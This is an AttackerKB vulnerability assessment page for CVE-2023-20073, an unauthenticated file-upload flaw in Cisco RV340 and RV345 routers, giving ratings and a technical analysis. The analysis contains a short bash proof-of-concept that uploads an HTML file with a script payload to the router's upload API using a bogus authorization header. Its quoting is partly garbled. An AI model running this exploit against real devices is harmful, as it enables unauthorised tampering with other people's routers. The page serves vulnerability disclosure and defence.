Very Low
CVE-2023-20073
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2023-20073
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
Add Assessment
Ratings
-
Attacker ValueVery Low
-
ExploitabilityVery High
Technical Analysis
An unauthorised File Upload (XSS) Vulnerability security flaw has been identified in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers.
This vulnerability may permit an attacker, who is not authenticated and operates remotely, to upload any file of their choice to a compromised device. The root cause of this vulnerability lies in the inadequacy of authorization enforcement mechanisms related to file uploads.
To exploit this flaw, an attacker could dispatch a meticulously crafted HTTP request to a vulnerable device. A successful exploitation of this vulnerability could empower the attacker to upload unrestricted files to the compromised device.
Test script:
#!/usr/bin/bash
TARGET=”https://x.x.x.x”;
FILENAME=“login.html”;
<script>
alert(‘XSS Test’)</script>
” > \(FILENAME; \
curl -ksX POST "\)TARGET/api/operations/ciscosb-file:form-file-upload” -H “Authorization: 1” -F “pathparam=Portal” -F “fileparam=\({FILENAME}" -F "file.path=\){FILENAME}” -F “file=@${FILENAME};type=application/octet-stream”;
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- cisco
Products
- rv340 firmware,
- rv340w firmware,
- rv345 firmware,
- rv345p firmware
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: